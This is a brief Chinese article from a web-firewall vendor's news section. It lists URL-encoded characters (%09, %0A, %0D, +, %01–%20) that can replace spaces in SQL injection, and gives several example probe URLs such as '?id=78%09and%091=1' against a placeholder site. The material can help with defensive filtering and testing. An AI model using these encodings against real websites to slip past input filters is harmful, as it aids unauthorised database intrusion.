SQL注入中可以替换空格的字符

		English
		电子信箱
		加入收藏

威盾防火墙 >> 新闻中心 >> 威盾新闻 >> SQL注入中可以替换空格的字符


SQL注入中可以替换空格的字符
威盾防火墙 2015-01-07

默认是：　　http://www.xxx.com/shownotice.asp?id=78 and 1=1 　　实际上用%09 %0A %0D +都可以替代空格　　例如：　　http://www.xxx.com/shownotice.asp?id=78%09and%091=1 　　http://www.xxx.com/shownotice.asp?id=78%0Aand%0A1=1 　　http://www.xxx.com/shownotice.asp?id=78%0Dand%0D1=1 　　http://www.xxx.com/shownotice.asp?id=78%+and+1=1 　　以下可以在SQLServer2000下可以替换%01到%20都可以　　http://www.xxx.com/shownotice.asp?id=78%19and%191=1

相关内容：	最新内容：
Web环境下SQL注入攻击的检测与防御[2015-01-07] SQL注入入侵防范技术措施[2015-01-07] SQL注入攻击的沉重代价[2015-01-07] 追查数据库SQL注入30小时[2015-01-07] SQL注入漏洞是IT安全的阿喀琉斯之踵[2015-01-07] 如何利用Google机器人进行SQL注入攻击[2015-01-07]	详谈IDS领域目前的热点[2015-01-07] 实例解析：高校网站如何防范黑客入侵挂马[2015-01-07] 分层纵深防御，一切黑客入侵都是浮云[2015-01-07] 防止黑客注入式攻击，最基本的防御手段。[2015-01-07] Web环境下SQL注入攻击的检测与防御[2015-01-07] 网络管理员防止黑客入侵服务器小三步曲[2015-01-07]

(C)2005-2016 威盾IIS防火墙 www.WeiDun.com.cn 版权所有

电话：(010)51661195 QQ支持:2600725

京ICP备09032906号